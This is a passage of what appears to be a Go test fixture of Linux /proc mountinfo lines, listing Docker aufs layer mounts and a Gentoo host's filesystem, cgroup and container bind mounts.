/var/lib/docker/aufs/mnt/de2b538c97d6366cc80e8658547c923ea1d042f85580df379846f36a4df7049d rw,relatime - aufs none rw,si=caafa54f85bb525 +49 20 0:42 / /var/lib/docker/aufs/mnt/94a3d8ed7c27e5b0aa71eba46c736bfb2742afda038e74f2dd6035fb28415b49-init rw,relatime - aufs none rw,si=caafa54fdc00525 +50 20 0:43 / /var/lib/docker/aufs/mnt/94a3d8ed7c27e5b0aa71eba46c736bfb2742afda038e74f2dd6035fb28415b49 rw,relatime - aufs none rw,si=caafa54fbaec525 +51 20 0:44 / /var/lib/docker/aufs/mnt/6ac1cace985c9fc9bea32234de8b36dba49bdd5e29a2972b327ff939d78a6274 rw,relatime - aufs none rw,si=caafa54f8e1a525 +52 20 0:45 / /var/lib/docker/aufs/mnt/dff147033e3a0ef061e1de1ad34256b523d4a8c1fa6bba71a0ab538e8628ff0b-init rw,relatime - aufs none rw,si=caafa54f8e1d525 +53 20 0:46 / /var/lib/docker/aufs/mnt/dff147033e3a0ef061e1de1ad34256b523d4a8c1fa6bba71a0ab538e8628ff0b rw,relatime - aufs none rw,si=caafa54f8e1b525 +54 20 0:47 / /var/lib/docker/aufs/mnt/cabb117d997f0f93519185aea58389a9762770b7496ed0b74a3e4a083fa45902 rw,relatime - aufs none rw,si=caafa54f810a525 +55 20 0:48 / /var/lib/docker/aufs/mnt/e1c8a94ffaa9d532bbbdc6ef771ce8a6c2c06757806ecaf8b68e9108fec65f33-init rw,relatime - aufs none rw,si=caafa54f8529525 +56 20 0:49 / /var/lib/docker/aufs/mnt/e1c8a94ffaa9d532bbbdc6ef771ce8a6c2c06757806ecaf8b68e9108fec65f33 rw,relatime - aufs none rw,si=caafa54f852f525 +57 20 0:50 / /var/lib/docker/aufs/mnt/16a1526fa445b84ce84f89506d219e87fa488a814063baf045d88b02f21166b3 rw,relatime - aufs none rw,si=caafa54f9e1d525 +58 20 0:51 / /var/lib/docker/aufs/mnt/57b9c92e1e368fa7dbe5079f7462e917777829caae732828b003c355fe49da9f-init rw,relatime - aufs none rw,si=caafa54f854d525 +59 20 0:52 / /var/lib/docker/aufs/mnt/57b9c92e1e368fa7dbe5079f7462e917777829caae732828b003c355fe49da9f rw,relatime - aufs none rw,si=caafa54f854e525 +60 20 0:53 / /var/lib/docker/aufs/mnt/e370c3e286bea027917baa0e4d251262681a472a87056e880dfd0513516dffd9 rw,relatime - aufs none rw,si=caafa54f840a525 +61 20 0:54 / /var/lib/docker/aufs/mnt/6b00d3b4f32b41997ec07412b5e18204f82fbe643e7122251cdeb3582abd424e-init rw,relatime - aufs none rw,si=caafa54f8408525 +62 20 0:55 / /var/lib/docker/aufs/mnt/6b00d3b4f32b41997ec07412b5e18204f82fbe643e7122251cdeb3582abd424e rw,relatime - aufs none rw,si=caafa54f8409525 +63 20 0:56 / /var/lib/docker/aufs/mnt/abd0b5ea5d355a67f911475e271924a5388ee60c27185fcd60d095afc4a09dc7 rw,relatime - aufs none rw,si=caafa54f9eb1525 +64 20 0:57 / /var/lib/docker/aufs/mnt/336222effc3f7b89867bb39ff7792ae5412c35c749f127c29159d046b6feedd2-init rw,relatime - aufs none rw,si=caafa54f85bf525 +65 20 0:58 / /var/lib/docker/aufs/mnt/336222effc3f7b89867bb39ff7792ae5412c35c749f127c29159d046b6feedd2 rw,relatime - aufs none rw,si=caafa54f85b8525 +66 20 0:59 / /var/lib/docker/aufs/mnt/912e1bf28b80a09644503924a8a1a4fb8ed10b808ca847bda27a369919aa52fa rw,relatime - aufs none rw,si=caafa54fbaea525 +67 20 0:60 / /var/lib/docker/aufs/mnt/386f722875013b4a875118367abc783fc6617a3cb7cf08b2b4dcf550b4b9c576-init rw,relatime - aufs none rw,si=caafa54f8472525 +68 20 0:61 / /var/lib/docker/aufs/mnt/386f722875013b4a875118367abc783fc6617a3cb7cf08b2b4dcf550b4b9c576 rw,relatime - aufs none rw,si=caafa54f8474525 +69 20 0:62 / /var/lib/docker/aufs/mnt/5aaebb79ef3097dfca377889aeb61a0c9d5e3795117d2b08d0751473c671dfb2 rw,relatime - aufs none rw,si=caafa54f8c5e525 +70 20 0:63 / /var/lib/docker/aufs/mnt/5ba3e493279d01277d583600b81c7c079e691b73c3a2bdea8e4b12a35a418be2-init rw,relatime - aufs none rw,si=caafa54f8c3b525 +71 20 0:64 / /var/lib/docker/aufs/mnt/5ba3e493279d01277d583600b81c7c079e691b73c3a2bdea8e4b12a35a418be2 rw,relatime - aufs none rw,si=caafa54f8c3d525 +72 20 0:65 / /var/lib/docker/aufs/mnt/2777f0763da4de93f8bebbe1595cc77f739806a158657b033eca06f827b6028a rw,relatime - aufs none rw,si=caafa54f8c3e525 +73 20 0:66 / /var/lib/docker/aufs/mnt/5d7445562acf73c6f0ae34c3dd0921d7457de1ba92a587d9e06a44fa209eeb3e-init rw,relatime - aufs none rw,si=caafa54f8c39525 +74 20 0:67 / /var/lib/docker/aufs/mnt/5d7445562acf73c6f0ae34c3dd0921d7457de1ba92a587d9e06a44fa209eeb3e rw,relatime - aufs none rw,si=caafa54f854f525 +75 20 0:68 / /var/lib/docker/aufs/mnt/06400b526ec18b66639c96efc41a84f4ae0b117cb28dafd56be420651b4084a0 rw,relatime - aufs none rw,si=caafa54f840b525 +76 20 0:69 / /var/lib/docker/aufs/mnt/e051d45ec42d8e3e1cc57bb39871a40de486dc123522e9c067fbf2ca6a357785-init rw,relatime - aufs none rw,si=caafa54fdddf525 +77 20 0:70 / /var/lib/docker/aufs/mnt/e051d45ec42d8e3e1cc57bb39871a40de486dc123522e9c067fbf2ca6a357785 rw,relatime - aufs none rw,si=caafa54f854b525 +78 20 0:71 / /var/lib/docker/aufs/mnt/1ff414fa93fd61ec81b0ab7b365a841ff6545accae03cceac702833aaeaf718f rw,relatime - aufs none rw,si=caafa54f8d85525 +79 20 0:72 / /var/lib/docker/aufs/mnt/c661b2f871dd5360e46a2aebf8f970f6d39a2ff64e06979aa0361227c88128b8-init rw,relatime - aufs none rw,si=caafa54f8da3525 +80 20 0:73 / /var/lib/docker/aufs/mnt/c661b2f871dd5360e46a2aebf8f970f6d39a2ff64e06979aa0361227c88128b8 rw,relatime - aufs none rw,si=caafa54f8da2525 +81 20 0:74 / /var/lib/docker/aufs/mnt/b68b1d4fe4d30016c552398e78b379a39f651661d8e1fa5f2460c24a5e723420 rw,relatime - aufs none rw,si=caafa54f8d81525 +82 20 0:75 / /var/lib/docker/aufs/mnt/c5c5979c936cd0153a4c626fa9d69ce4fce7d924cc74fa68b025d2f585031739-init rw,relatime - aufs none rw,si=caafa54f8da1525 +83 20 0:76 / /var/lib/docker/aufs/mnt/c5c5979c936cd0153a4c626fa9d69ce4fce7d924cc74fa68b025d2f585031739 rw,relatime - aufs none rw,si=caafa54f8da0525 +84 20 0:77 / /var/lib/docker/aufs/mnt/53e10b0329afc0e0d3322d31efaed4064139dc7027fe6ae445cffd7104bcc94f rw,relatime - aufs none rw,si=caafa54f8c35525 +85 20 0:78 / /var/lib/docker/aufs/mnt/3bfafd09ff2603e2165efacc2215c1f51afabba6c42d04a68cc2df0e8cc31494-init rw,relatime - aufs none rw,si=caafa54f8db8525 +86 20 0:79 / /var/lib/docker/aufs/mnt/3bfafd09ff2603e2165efacc2215c1f51afabba6c42d04a68cc2df0e8cc31494 rw,relatime - aufs none rw,si=caafa54f8dba525 +87 20 0:80 / /var/lib/docker/aufs/mnt/90fdd2c03eeaf65311f88f4200e18aef6d2772482712d9aea01cd793c64781b5 rw,relatime - aufs none rw,si=caafa54f8315525 +88 20 0:81 / /var/lib/docker/aufs/mnt/7bdf2591c06c154ceb23f5e74b1d03b18fbf6fe96e35fbf539b82d446922442f-init rw,relatime - aufs none rw,si=caafa54f8fc6525 +89 20 0:82 / /var/lib/docker/aufs/mnt/7bdf2591c06c154ceb23f5e74b1d03b18fbf6fe96e35fbf539b82d446922442f rw,relatime - aufs none rw,si=caafa54f8468525 +90 20 0:83 / /var/lib/docker/aufs/mnt/8cf9a993f50f3305abad3da268c0fc44ff78a1e7bba595ef9de963497496c3f9 rw,relatime - aufs none rw,si=caafa54f8c59525 +91 20 0:84 / /var/lib/docker/aufs/mnt/ecc896fd74b21840a8d35e8316b92a08b1b9c83d722a12acff847e9f0ff17173-init rw,relatime - aufs none rw,si=caafa54f846a525 +92 20 0:85 / /var/lib/docker/aufs/mnt/ecc896fd74b21840a8d35e8316b92a08b1b9c83d722a12acff847e9f0ff17173 rw,relatime - aufs none rw,si=caafa54f846b525 +93 20 0:86 / /var/lib/docker/aufs/mnt/d8c8288ec920439a48b5796bab5883ee47a019240da65e8d8f33400c31bac5df rw,relatime - aufs none rw,si=caafa54f8dbf525 +94 20 0:87 / /var/lib/docker/aufs/mnt/ecba66710bcd03199b9398e46c005cd6b68d0266ec81dc8b722a29cc417997c6-init rw,relatime - aufs none rw,si=caafa54f810f525 +95 20 0:88 / /var/lib/docker/aufs/mnt/ecba66710bcd03199b9398e46c005cd6b68d0266ec81dc8b722a29cc417997c6 rw,relatime - aufs none rw,si=caafa54fbae9525 +96 20 0:89 / /var/lib/docker/aufs/mnt/befc1c67600df449dddbe796c0d06da7caff1d2bbff64cde1f0ba82d224996b5 rw,relatime - aufs none rw,si=caafa54f8dab525 +97 20 0:90 / /var/lib/docker/aufs/mnt/c9f470e73d2742629cdc4084a1b2c1a8302914f2aa0d0ec4542371df9a050562-init rw,relatime - aufs none rw,si=caafa54fdc02525 +98 20 0:91 / /var/lib/docker/aufs/mnt/c9f470e73d2742629cdc4084a1b2c1a8302914f2aa0d0ec4542371df9a050562 rw,relatime - aufs none rw,si=caafa54f9eb0525 +99 20 0:92 / /var/lib/docker/aufs/mnt/2a31f10029f04ff9d4381167a9b739609853d7220d55a56cb654779a700ee246 rw,relatime - aufs none rw,si=caafa54f8c37525 +100 20 0:93 / /var/lib/docker/aufs/mnt/8c4261b8e3e4b21ebba60389bd64b6261217e7e6b9fd09e201d5a7f6760f6927-init rw,relatime - aufs none rw,si=caafa54fd173525 +101 20 0:94 / /var/lib/docker/aufs/mnt/8c4261b8e3e4b21ebba60389bd64b6261217e7e6b9fd09e201d5a7f6760f6927 rw,relatime - aufs none rw,si=caafa54f8108525 +102 20 0:95 / /var/lib/docker/aufs/mnt/eaa0f57403a3dc685268f91df3fbcd7a8423cee50e1a9ee5c3e1688d9d676bb4 rw,relatime - aufs none rw,si=caafa54f852d525 +103 20 0:96 / /var/lib/docker/aufs/mnt/9cfe69a2cbffd9bfc7f396d4754f6fe5cc457ef417b277797be3762dfe955a6b-init rw,relatime - aufs none rw,si=caafa54f8d80525 +104 20 0:97 / /var/lib/docker/aufs/mnt/9cfe69a2cbffd9bfc7f396d4754f6fe5cc457ef417b277797be3762dfe955a6b rw,relatime - aufs none rw,si=caafa54f8fc3525 +105 20 0:98 / /var/lib/docker/aufs/mnt/d1b322ae17613c6adee84e709641a9244ac56675244a89a64dc0075075fcbb83 rw,relatime - aufs none rw,si=caafa54f8c58525 +106 20 0:99 / /var/lib/docker/aufs/mnt/d46c2a8e9da7e91ab34fd9c192851c246a4e770a46720bda09e55c7554b9dbbd-init rw,relatime - aufs none rw,si=caafa54f8c63525 +107 20 0:100 / /var/lib/docker/aufs/mnt/d46c2a8e9da7e91ab34fd9c192851c246a4e770a46720bda09e55c7554b9dbbd rw,relatime - aufs none rw,si=caafa54f8c67525 +108 20 0:101 / /var/lib/docker/aufs/mnt/bc9d2a264158f83a617a069bf17cbbf2a2ba453db7d3951d9dc63cc1558b1c2b rw,relatime - aufs none rw,si=caafa54f8dbe525 +109 20 0:102 / /var/lib/docker/aufs/mnt/9e6abb8d72bbeb4d5cf24b96018528015ba830ce42b4859965bd482cbd034e99-init rw,relatime - aufs none rw,si=caafa54f9e0d525 +110 20 0:103 / /var/lib/docker/aufs/mnt/9e6abb8d72bbeb4d5cf24b96018528015ba830ce42b4859965bd482cbd034e99 rw,relatime - aufs none rw,si=caafa54f9e1b525 +111 20 0:104 / /var/lib/docker/aufs/mnt/d4dca7b02569c732e740071e1c654d4ad282de5c41edb619af1f0aafa618be26 rw,relatime - aufs none rw,si=caafa54f8dae525 +112 20 0:105 / /var/lib/docker/aufs/mnt/fea63da40fa1c5ffbad430dde0bc64a8fc2edab09a051fff55b673c40a08f6b7-init rw,relatime - aufs none rw,si=caafa54f8c5c525 +113 20 0:106 / /var/lib/docker/aufs/mnt/fea63da40fa1c5ffbad430dde0bc64a8fc2edab09a051fff55b673c40a08f6b7 rw,relatime - aufs none rw,si=caafa54fd172525 +114 20 0:107 / /var/lib/docker/aufs/mnt/e60c57499c0b198a6734f77f660cdbbd950a5b78aa23f470ca4f0cfcc376abef rw,relatime - aufs none rw,si=caafa54909c4525 +115 20 0:108 / /var/lib/docker/aufs/mnt/099c78e7ccd9c8717471bb1bbfff838c0a9913321ba2f214fbeaf92c678e5b35-init rw,relatime - aufs none rw,si=caafa54909c3525 +116 20 0:109 / /var/lib/docker/aufs/mnt/099c78e7ccd9c8717471bb1bbfff838c0a9913321ba2f214fbeaf92c678e5b35 rw,relatime - aufs none rw,si=caafa54909c7525 +117 20 0:110 / /var/lib/docker/aufs/mnt/2997be666d58b9e71469759bcb8bd9608dad0e533a1a7570a896919ba3388825 rw,relatime - aufs none rw,si=caafa54f8557525 +118 20 0:111 / /var/lib/docker/aufs/mnt/730694eff438ef20569df38dfb38a920969d7ff2170cc9aa7cb32a7ed8147a93-init rw,relatime - aufs none rw,si=caafa54c6e88525 +119 20 0:112 / /var/lib/docker/aufs/mnt/730694eff438ef20569df38dfb38a920969d7ff2170cc9aa7cb32a7ed8147a93 rw,relatime - aufs none rw,si=caafa54c6e8e525 +120 20 0:113 / /var/lib/docker/aufs/mnt/a672a1e2f2f051f6e19ed1dfbe80860a2d774174c49f7c476695f5dd1d5b2f67 rw,relatime - aufs none rw,si=caafa54c6e15525 +121 20 0:114 / /var/lib/docker/aufs/mnt/aba3570e17859f76cf29d282d0d150659c6bd80780fdc52a465ba05245c2a420-init rw,relatime - aufs none rw,si=caafa54f8dad525 +122 20 0:115 / /var/lib/docker/aufs/mnt/aba3570e17859f76cf29d282d0d150659c6bd80780fdc52a465ba05245c2a420 rw,relatime - aufs none rw,si=caafa54f8d84525 +123 20 0:116 / /var/lib/docker/aufs/mnt/2abc86007aca46fb4a817a033e2a05ccacae40b78ea4b03f8ea616b9ada40e2e rw,relatime - aufs none rw,si=caafa54c6e8b525 +124 20 0:117 / /var/lib/docker/aufs/mnt/36352f27f7878e648367a135bd1ec3ed497adcb8ac13577ee892a0bd921d2374-init rw,relatime - aufs none rw,si=caafa54c6e8d525 +125 20 0:118 / /var/lib/docker/aufs/mnt/36352f27f7878e648367a135bd1ec3ed497adcb8ac13577ee892a0bd921d2374 rw,relatime - aufs none rw,si=caafa54f8c34525 +126 20 0:119 / /var/lib/docker/aufs/mnt/2f95ca1a629cea8363b829faa727dd52896d5561f2c96ddee4f697ea2fc872c2 rw,relatime - aufs none rw,si=caafa54c6e8a525 +127 20 0:120 / /var/lib/docker/aufs/mnt/f108c8291654f179ef143a3e07de2b5a34adbc0b28194a0ab17742b6db9a7fb2-init rw,relatime - aufs none rw,si=caafa54f8e19525 +128 20 0:121 / /var/lib/docker/aufs/mnt/f108c8291654f179ef143a3e07de2b5a34adbc0b28194a0ab17742b6db9a7fb2 rw,relatime - aufs none rw,si=caafa54fa8c6525 +129 20 0:122 / /var/lib/docker/aufs/mnt/c1d04dfdf8cccb3676d5a91e84e9b0781ce40623d127d038bcfbe4c761b27401 rw,relatime - aufs none rw,si=caafa54f8c30525 +130 20 0:123 / /var/lib/docker/aufs/mnt/3f4898ffd0e1239aeebf1d1412590cdb7254207fa3883663e2c40cf772e5f05a-init rw,relatime - aufs none rw,si=caafa54c6e1a525 +131 20 0:124 / /var/lib/docker/aufs/mnt/3f4898ffd0e1239aeebf1d1412590cdb7254207fa3883663e2c40cf772e5f05a rw,relatime - aufs none rw,si=caafa54c6e1c525 +132 20 0:125 / /var/lib/docker/aufs/mnt/5ae3b6fccb1539fc02d420e86f3e9637bef5b711fed2ca31a2f426c8f5deddbf rw,relatime - aufs none rw,si=caafa54c4fea525 +133 20 0:126 / /var/lib/docker/aufs/mnt/310bfaf80d57020f2e73b06aeffb0b9b0ca2f54895f88bf5e4d1529ccac58fe0-init rw,relatime - aufs none rw,si=caafa54c6e1e525 +134 20 0:127 / /var/lib/docker/aufs/mnt/310bfaf80d57020f2e73b06aeffb0b9b0ca2f54895f88bf5e4d1529ccac58fe0 rw,relatime - aufs none rw,si=caafa54fa8c0525 +135 20 0:128 / /var/lib/docker/aufs/mnt/f382bd5aaccaf2d04a59089ac7cb12ec87efd769fd0c14d623358fbfd2a3f896 rw,relatime - aufs none rw,si=caafa54c4fec525 +136 20 0:129 / /var/lib/docker/aufs/mnt/50d45e9bb2d779bc6362824085564c7578c231af5ae3b3da116acf7e17d00735-init rw,relatime - aufs none rw,si=caafa54c4fef525 +137 20 0:130 / /var/lib/docker/aufs/mnt/50d45e9bb2d779bc6362824085564c7578c231af5ae3b3da116acf7e17d00735 rw,relatime - aufs none rw,si=caafa54c4feb525 +138 20 0:131 / /var/lib/docker/aufs/mnt/a9c5ee0854dc083b6bf62b7eb1e5291aefbb10702289a446471ce73aba0d5d7d rw,relatime - aufs none rw,si=caafa54909c6525 +139 20 0:134 / /var/lib/docker/aufs/mnt/03a613e7bd5078819d1fd92df4e671c0127559a5e0b5a885cc8d5616875162f0-init rw,relatime - aufs none rw,si=caafa54804fe525 +140 20 0:135 / /var/lib/docker/aufs/mnt/03a613e7bd5078819d1fd92df4e671c0127559a5e0b5a885cc8d5616875162f0 rw,relatime - aufs none rw,si=caafa54804fa525 +141 20 0:136 / /var/lib/docker/aufs/mnt/7ec3277e5c04c907051caf9c9c35889f5fcd6463e5485971b25404566830bb70 rw,relatime - aufs none rw,si=caafa54804f9525 +142 20 0:139 / /var/lib/docker/aufs/mnt/26b5b5d71d79a5b2bfcf8bc4b2280ee829f261eb886745dd90997ed410f7e8b8-init rw,relatime - aufs none rw,si=caafa54c6ef6525 +143 20 0:140 / /var/lib/docker/aufs/mnt/26b5b5d71d79a5b2bfcf8bc4b2280ee829f261eb886745dd90997ed410f7e8b8 rw,relatime - aufs none rw,si=caafa54c6ef5525 +144 20 0:356 / /var/lib/docker/aufs/mnt/e6ecde9e2c18cd3c75f424c67b6d89685cfee0fc67abf2cb6bdc0867eb998026 rw,relatime - aufs none rw,si=caafa548068e525` + + gentooMountinfo = `15 1 8:6 / / rw,noatime,nodiratime - ext4 /dev/sda6 rw,data=ordered +16 15 0:3 / /proc rw,nosuid,nodev,noexec,relatime - proc proc rw +17 15 0:14 / /run rw,nosuid,nodev,relatime - tmpfs tmpfs rw,size=3292172k,mode=755 +18 15 0:5 / /dev rw,nosuid,relatime - devtmpfs udev rw,size=10240k,nr_inodes=4106451,mode=755 +19 18 0:12 / /dev/mqueue rw,nosuid,nodev,noexec,relatime - mqueue mqueue rw +20 18 0:10 / /dev/pts rw,nosuid,noexec,relatime - devpts devpts rw,gid=5,mode=620,ptmxmode=000 +21 18 0:15 / /dev/shm rw,nosuid,nodev,noexec,relatime - tmpfs shm rw +22 15 0:16 / /sys rw,nosuid,nodev,noexec,relatime - sysfs sysfs rw +23 22 0:7 / /sys/kernel/debug rw,nosuid,nodev,noexec,relatime - debugfs debugfs rw +24 22 0:17 / /sys/fs/cgroup rw,nosuid,nodev,noexec,relatime - tmpfs cgroup_root rw,size=10240k,mode=755 +25 24 0:18 / /sys/fs/cgroup/openrc rw,nosuid,nodev,noexec,relatime - cgroup openrc rw,release_agent=/lib64/rc/sh/cgroup-release-agent.sh,name=openrc +26 24 0:19 / /sys/fs/cgroup/cpuset rw,nosuid,nodev,noexec,relatime - cgroup cpuset rw,cpuset,clone_children +27 24 0:20 / /sys/fs/cgroup/cpu rw,nosuid,nodev,noexec,relatime - cgroup cpu rw,cpu,clone_children +28 24 0:21 / /sys/fs/cgroup/cpuacct rw,nosuid,nodev,noexec,relatime - cgroup cpuacct rw,cpuacct,clone_children +29 24 0:22 / /sys/fs/cgroup/memory rw,nosuid,nodev,noexec,relatime - cgroup memory rw,memory,clone_children +30 24 0:23 / /sys/fs/cgroup/devices rw,nosuid,nodev,noexec,relatime - cgroup devices rw,devices,clone_children +31 24 0:24 / /sys/fs/cgroup/freezer rw,nosuid,nodev,noexec,relatime - cgroup freezer rw,freezer,clone_children +32 24 0:25 / /sys/fs/cgroup/blkio rw,nosuid,nodev,noexec,relatime - cgroup blkio rw,blkio,clone_children +33 15 8:1 / /boot rw,noatime,nodiratime - vfat /dev/sda1 rw,fmask=0022,dmask=0022,codepage=437,iocharset=iso8859-1,shortname=mixed,errors=remount-ro +34 15 8:18 / /mnt/xfs rw,noatime,nodiratime - xfs /dev/sdb2 rw,attr2,inode64,noquota +35 15 0:26 / /tmp rw,relatime - tmpfs tmpfs rw +36 16 0:27 / /proc/sys/fs/binfmt_misc rw,nosuid,nodev,noexec,relatime - binfmt_misc binfmt_misc rw +42 15 0:33 / /var/lib/nfs/rpc_pipefs rw,relatime - rpc_pipefs rpc_pipefs rw +43 16 0:34 / /proc/fs/nfsd rw,nosuid,nodev,noexec,relatime - nfsd nfsd rw +44 15 0:35 / /home/tianon/.gvfs rw,nosuid,nodev,relatime - fuse.gvfs-fuse-daemon gvfs-fuse-daemon rw,user_id=1000,group_id=1000 +68 15 0:3336 / /var/lib/docker/aufs/mnt/3597a1a6d6298c1decc339ebb90aad6f7d6ba2e15af3131b1f85e7ee4787a0cd rw,relatime - aufs none rw,si=9b4a7640128db39c +86 68 8:6 /var/lib/docker/containers/3597a1a6d6298c1decc339ebb90aad6f7d6ba2e15af3131b1f85e7ee4787a0cd/config.env /var/lib/docker/aufs/mnt/3597a1a6d6298c1decc339ebb90aad6f7d6ba2e15af3131b1f85e7ee4787a0cd/.dockerenv rw,noatime,nodiratime - ext4 /dev/sda6 rw,data=ordered +87 68 8:6 /etc/resolv.conf /var/lib/docker/aufs/mnt/3597a1a6d6298c1decc339ebb90aad6f7d6ba2e15af3131b1f85e7ee4787a0cd/etc/resolv.conf rw,noatime,nodiratime - ext4 /dev/sda6 rw,data=ordered +88 68 8:6 /var/lib/docker/containers/3597a1a6d6298c1decc339ebb90aad6f7d6ba2e15af3131b1f85e7ee4787a0cd/hostname /var/lib/docker/aufs/mnt/3597a1a6d6298c1decc339ebb90aad6f7d6ba2e15af3131b1f85e7ee4787a0cd/etc/hostname rw,noatime,nodiratime - ext4 /dev/sda6 rw,data=ordered +89 68 8:6 /var/lib/docker/containers/3597a1a6d6298c1decc339ebb90aad6f7d6ba2e15af3131b1f85e7ee4787a0cd/hosts /var/lib/docker/aufs/mnt/3597a1a6d6298c1decc339ebb90aad6f7d6ba2e15af3131b1f85e7ee4787a0cd/etc/hosts rw,noatime,nodiratime - ext4 /dev/sda6 rw,data=ordered +38 15 0:3384 / /var/lib/docker/aufs/mnt/0292005a9292401bb5197657f2b682d97d8edcb3b72b5e390d2a680139985b55 rw,relatime - aufs none rw,si=9b4a7642b584939c +39 15 0:3385 / /var/lib/docker/aufs/mnt/59db98c889de5f71b70cfb82c40cbe47b64332f0f56042a2987a9e5df6e5e3aa rw,relatime - aufs none rw,si=9b4a7642b584e39c +40 15 0:3386 / /var/lib/docker/aufs/mnt/0545f0f2b6548eb9601d08f35a08f5a0a385407d36027a28f58e06e9f61e0278 rw,relatime - aufs none rw,si=9b4a7642b584b39c +41 15 0:3387 / /var/lib/docker/aufs/mnt/d882cfa16d1aa8fe0331a36e79be3d80b151e49f24fc39a39c3fed1735d5feb5 rw,relatime - aufs none rw,si=9b4a76453040039c +45 15 0:3388 / /var/lib/docker/aufs/mnt/055ca3befcb1626e74f5344b3398724ff05c0de0e20021683d04305c9e70a3f6 rw,relatime - aufs none rw,si=9b4a76453040739c +46 15 0:3389 / /var/lib/docker/aufs/mnt/b899e4567a351745d4285e7f1c18fdece75d877deb3041981cd290be348b7aa6 rw,relatime - aufs none rw,si=9b4a7647def4039c +47 15 0:3390 / /var/lib/docker/aufs/mnt/067ca040292c58954c5129f953219accfae0d40faca26b4d05e76ca76a998f16 rw,relatime - aufs none rw,si=9b4a7647def4239c +48 15 0:3391 / /var/lib/docker/aufs/mnt/8c995e7cb6e5082742daeea720e340b021d288d25d92e0412c03d200df308a11 rw,relatime - aufs none rw,si=9b4a764479c1639c +49 15 0:3392 / /var/lib/docker/aufs/mnt/07cc54dfae5b45300efdacdd53cc72c01b9044956a86ce7bff42d087e426096d rw,relatime - aufs none rw,si=9b4a764479c1739c +50 15 0:3393 / /var/lib/docker/aufs/mnt/0a9c95cf4c589c05b06baa79150b0cc1d8e7102759fe3ce4afaabb8247ca4f85 rw,relatime - aufs none rw,si=9b4a7644059c839c +51 15 0:3394 / /var/lib/docker/aufs/mnt/468fa98cececcf4e226e8370f18f4f848d63faf287fb8321a07f73086441a3a0 rw,relatime - aufs none rw,si=9b4a7644059ca39c +52 15 0:3395 / /var/lib/docker/aufs/mnt/0b826192231c5ce066fffb5beff4397337b5fc19a377aa7c6282c7c0ce7f111f rw,relatime - aufs none rw,si=9b4a764479c1339c +53 15 0:3396 / /var/lib/docker/aufs/mnt/93b8ba1b772fbe79709b909c43ea4b2c30d712e53548f467db1ffdc7a384f196 rw,relatime - aufs none rw,si=9b4a7640798a739c +54 15 0:3397 / /var/lib/docker/aufs/mnt/0c0d0acfb506859b12ef18cdfef9ebed0b43a611482403564224bde9149d373c rw,relatime - aufs none rw,si=9b4a7640798a039c +55 15 0:3398 / /var/lib/docker/aufs/mnt/33648c39ab6c7c74af0243d6d6a81b052e9e25ad1e04b19892eb2dde013e358b rw,relatime - aufs none rw,si=9b4a7644b439b39c +56 15 0:3399 / /var/lib/docker/aufs/mnt/0c12bea97a1c958a3c739fb148536c1c89351d48e885ecda8f0499b5cc44407e rw,relatime - aufs none rw,si=9b4a7640798a239c +57 15 0:3400 / /var/lib/docker/aufs/mnt/ed443988ce125f172d7512e84a4de2627405990fd767a16adefa8ce700c19ce8 rw,relatime - aufs none rw,si=9b4a7644c8ed339c +59 15 0:3402 / /var/lib/docker/aufs/mnt/f61612c324ff3c924d3f7a82fb00a0f8d8f73c248c41897061949e9f5ab7e3b1 rw,relatime - aufs none rw,si=9b4a76442810c39c +60 15 0:3403 / /var/lib/docker/aufs/mnt/0f1ee55c6c4e25027b80de8e64b8b6fb542b3b41aa0caab9261da75752e22bfd rw,relatime - aufs none rw,si=9b4a76442810e39c +61 15 0:3404 / /var/lib/docker/aufs/mnt/956f6cc4af5785cb3ee6963dcbca668219437d9b28f513290b1453ac64a34f97 rw,relatime - aufs none rw,si=9b4a7644303ec39c +62 15 0:3405 / /var/lib/docker/aufs/mnt/1099769158c4b4773e2569e38024e8717e400f87a002c41d8cf47cb81b051ba6 rw,relatime - aufs none rw,si=9b4a7644303ee39c +63 15 0:3406 / /var/lib/docker/aufs/mnt/11890ceb98d4442595b676085cd7b21550ab85c5df841e0fba997ff54e3d522d rw,relatime - aufs none rw,si=9b4a7644303ed39c +64 15 0:3407 / /var/lib/docker/aufs/mnt/acdb90dc378e8ed2420b43a6d291f1c789a081cd1904018780cc038fcd7aae53 rw,relatime - aufs none rw,si=9b4a76434be2139c +65 15 0:3408 / /var/lib/docker/aufs/mnt/120e716f19d4714fbe63cc1ed246204f2c1106eefebc6537ba2587d7e7711959 rw,relatime - aufs none rw,si=9b4a76434be2339c +66 15 0:3409 / /var/lib/docker/aufs/mnt/b197b7fffb61d89e0ba1c40de9a9fc0d912e778b3c1bd828cf981ff37c1963bc rw,relatime - aufs none rw,si=9b4a76434be2039c +70 15 0:3412 / /var/lib/docker/aufs/mnt/1434b69d2e1bb18a9f0b96b9cdac30132b2688f5d1379f68a39a5e120c2f93eb rw,relatime - aufs none rw,si=9b4a76434be2639c +71 15 0:3413 / /var/lib/docker/aufs/mnt/16006e83caf33ab5eb0cd6afc92ea2ee8edeff897496b0bb3ec3a75b767374b3 rw,relatime - aufs none rw,si=9b4a7644d790439c +72 15 0:3414 / /var/lib/docker/aufs/mnt/55bfa5f44e94d27f91f79ba901b118b15098449165c87abf1b53ffff147ff164 rw,relatime - aufs none rw,si=9b4a7644d790239c +73 15 0:3415 / /var/lib/docker/aufs/mnt/1912b97a07ab21ccd98a2a27bc779bf3cf364a3138afa3c3e6f7f169a3c3eab5 rw,relatime - aufs none rw,si=9b4a76441822739c +76 15 0:3418 / /var/lib/docker/aufs/mnt/1a7c3292e8879bd91ffd9282e954f643b1db5683093574c248ff14a9609f2f56 rw,relatime - aufs none rw,si=9b4a76438cb7239c +77 15 0:3419 / /var/lib/docker/aufs/mnt/bb1faaf0d076ddba82c2318305a85f490dafa4e8a8640a8db8ed657c439120cc rw,relatime - aufs none rw,si=9b4a76438cb7339c +78 15 0:3420 / /var/lib/docker/aufs/mnt/1ab869f21d2241a73ac840c7f988490313f909ac642eba71d092204fec66dd7c rw,relatime - aufs none rw,si=9b4a76438cb7639c +79 15 0:3421 / /var/lib/docker/aufs/mnt/fd7245b2cfe3890fa5f5b452260e4edf9e7fb7746532ed9d83f7a0d7dbaa610e rw,relatime - aufs none rw,si=9b4a7644bdc0139c +80 15 0:3422 / /var/lib/docker/aufs/mnt/1e5686c5301f26b9b3cd24e322c608913465cc6c5d0dcd7c5e498d1314747d61 rw,relatime - aufs none rw,si=9b4a7644bdc0639c +81 15 0:3423 / /var/lib/docker/aufs/mnt/52edf6ee6e40bfec1e9301a4d4a92ab83d144e2ae4ce5099e99df6138cb844bf rw,relatime - aufs none rw,si=9b4a7644bdc0239c +82 15 0:3424 / 